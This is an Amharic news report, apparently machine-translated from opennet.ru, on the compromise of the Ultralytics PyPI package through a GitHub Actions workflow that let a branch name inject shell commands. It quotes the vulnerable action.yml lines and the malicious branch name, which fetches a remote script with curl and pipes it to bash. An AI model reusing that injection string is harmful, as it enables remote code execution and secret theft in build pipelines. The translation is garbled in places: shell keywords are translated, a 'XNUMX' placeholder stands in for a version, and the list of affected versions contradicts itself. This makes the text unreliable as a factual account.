አጥቂዎቹ በ Ultralytics Python ቤተ-መጽሐፍት ማከማቻ ውስጥ በ GitHub Actions ተቆጣጣሪ መብቶችን ማስፈጸም ችለዋል፣ ይህም የኮምፒዩተር የማየት ችግሮችን ለመፍታት እንደ ምስሎች ውስጥ ያሉ ነገሮችን ፈልጎ ማግኘት እና ምስሎችን መከፋፈል። የማጠራቀሚያውን መዳረሻ ካገኙ በኋላ፣ አጥቂዎቹ በPyPI ማውጫ ውስጥ በርካታ አዳዲስ Ultralytics ልቀቶችን አሳትመዋል፣ እነዚህም በክሪፕቶፕ ማዕድን ማውጣት ላይ ጎጂ ለውጦችን አካተዋል። ባለፈው ወር የ Ultralytics ቤተ-መጽሐፍት ከፒፒአይ ካታሎግ ከ6.4 ሚሊዮን ጊዜ በላይ ወርዷል።
ማከማቻውን ለመጣስ፣ ተጋላጭነት በ ultralytics-actions ጥቅል ውስጥ ጥቅም ላይ ውሏል፣ ይህም የተወሰኑ እርምጃዎች GitHub ላይ ባለው ማከማቻ ላይ የ GitHub Actions ዘዴን በመጠቀም ተቆጣጣሪዎችን በራስ-ሰር ለማስጀመር ይጠቅማል። በ ultralytics ፕሮጀክት ውስጥ፣ ተጋላጭ ተቆጣጣሪው ከፑል_ጥያቄ_ዒላማ ክስተት ጋር ተያይዟል እና አዲስ የመሳብ ጥያቄዎች ሲመጡ ተጠርቷል። በተለይም በተላኩት የመሳብ ጥያቄዎች ውስጥ ያለውን ኮድ ለመቅረጽ የ format.yml ተቆጣጣሪው ተጠርቷል እና በ "አሂድ" ክፍል ውስጥ የተገለጸው ኮድ በ action.yml ፋይል ውስጥ ተተግብሯል ፣ እሱም የሼል ትዕዛዞችን ከመተካት ቅጦች ጋር ይይዛል-git pull origin ${{ github.head_ref || github.ref }} git config --global user.ስም "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}"
ስለዚህ፣ በመጎተት ጥያቄ ውስጥ የተጠቀሰው የጊት ቅርንጫፍ ስም በትክክል ማምለጥ ሳያስፈልግ በሼል ትዕዛዞች ተተካ። በነሀሴ ወር የ ultralytics-actions ጥቅል ከውጫዊ እሴት አጠቃቀም ጋር የተያያዘ ተመሳሳይ ተጋላጭነትን በማስተጋባት “github.event.pull_request.head.ref: ${{github.event.pull_request” ላይ ማድረጉ ትኩረት የሚስብ ነው። .head.ref }} »
በ GitHub Actions ተቆጣጣሪው ውስጥ የኮዳቸውን አፈጻጸም ለማደራጀት አጥቂዎቹ ወደ ultralytics ማከማቻው የመጎተት ጥያቄ ልከዋል፣ ይህም የሚከተለውን እንደ ቅርንጫፍ ስም ገልጿል። openimbot:$({curl,-sSfL,raw.githubusercontent.com/ultralytics/ultralytics/12e4f54ca3f2e69bcdc900d1c6e16642ca8ae545/file.sh}${IFS}|${IFS}ባሽ)
በዚህ መሰረት፣ የመጎተት ጥያቄ ሲደርሰው፣ በአጥቂው የተገለጸው ሕብረቁምፊ "$(…)" ወደ ኮድ ገብቷል፣ ይህም ተቆጣጣሪው በመቀጠል ሲጀመር፣ የ"curl -sSfL raw.githubusercontent" የሚለውን ኮድ እንዲፈፀም አድርጓል። com/…/file.sh | ባሽ"
በ GitHub Actions አውድ ውስጥ የማስኬጃ ኮድ ወደ ማከማቻ መዳረሻ ቶከን እና ሌሎች ሚስጥራዊ መረጃዎችን ለመያዝ ሊያገለግል ይችላል። በ GitHub Actions ውስጥ ኮዳቸውን የማስፈጸም ችሎታ ስላላቸው አጥቂዎቹ እንዴት በትክክል መልቀቅ እንደቻሉ ገና ግልጽ አይደለም፤ ይህ ሊሆን የቻለው በአሳታሚው.yml ተቆጣጣሪው ላይ በተደረገ ለውጥ ነው (አጥቂዎቹ የማስታወቂያውን ማረጋገጫ አስወግደዋል)። በPyPI ውስጥ የተለቀቁትን ለማተም የተፈቀደለት መለያ እና የቴክኖሎጂ መመረዝ GitHub Actions የግንባታ መሸጎጫ ውሂብዎን ወደ ልቀቱ ውስጥ ለማስገባት።
የመጀመሪያው የUltralytics 8.3.41 ተንኮል አዘል ልቀት በPyPI ላይ በታህሳስ 4 ከቀኑ 23፡51 PM (MSK) ላይ በአጥቂዎች ታትሞ በቀጣዩ ቀን ከቀኑ 12፡15 PM ላይ ተወግዷል። በ15፡47 PM ላይ ሌላ እትም፣ 8.3.42፣ ተለጥፎ በ16፡47 PM ላይ ተወግዷል። ስለዚህ፣ ተንኮል አዘል ስሪቶች ለ13 ሰዓታት ያህል ለማውረድ ዝግጁ ነበሩ (PyPI በቀን 250 የሚያህሉ የultralytics ቤተ-መጽሐፍት ውርዶችን ይመዘግባል)። 8.3.41 እና 8.3.42 የሚለቀቁት ከውጫዊ የወረደ ኮድ ነበራቸው አገልጋይ ለክሪፕቶ ምንዛሬ ማዕድን ማውጣት የXMRig አካል።
የፕሮጀክት አዘጋጆቹ ችግሩን አስተካክለው የማስተካከያ እትሞችን 8.3.43 እና 8.3.44 ፈጥረዋል፣ ነገር ግን ከሁለት ቀናት በኋላ ሌላ ጥቃት ተፈጽሟል፣ በዚህ ጊዜ አጥቂዎቹ ዛሬ 04፡41 እና 05፡27 (MSK) ላይ ሁለት ተጨማሪ ተንኮል አዘል ልቀቶችን አሳትመዋል - 8.3.45. 8.3.46 እና 8.3.44, ይህም ሌሎች የማዕድን ኮድ ያካትታል. ምርመራው እስኪያበቃ ድረስ ተጠቃሚዎች አዳዲስ ስሪቶችን መጫኑን እንዲያቆሙ እና ልቀቱን XNUMX እንደ ጥገኞች እንዲያስተካክሉ ይመከራሉ።
ምንጭ: opennet.ru
